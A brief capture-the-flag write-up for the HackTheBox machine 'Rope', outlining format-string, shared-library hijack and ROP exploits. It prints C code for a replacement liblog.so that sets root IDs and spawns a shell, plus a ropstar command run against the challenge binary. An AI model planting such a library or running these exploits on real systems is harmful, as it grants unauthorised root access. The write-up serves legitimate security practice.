HTB Rope Write-up

less than 1 minute read

Rope is a 50-point machine on HackTheBox that involves 3 binary exploits. There is a format string vulnerability in the boxes’s webserver and a replaceable shared library used by a binary we can run with sudo. Finally there is another binary where we have to bypass a stack canary and use ROP. My walkthrough is available on youtube:

Notes


The user exploit.

Liblog.so:

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

void printlog(){
    setuid(0);
    setgid(0);
    system("/bin/sh",NULL,NULL);
}

The root exploit.

Solving with ropstar:

python3 ~/tools/ropstar/ropstar.py -rhost localhost -rport 1337 -remote_offset ./contact

Thanks r4j for creating this fun box!

Updated: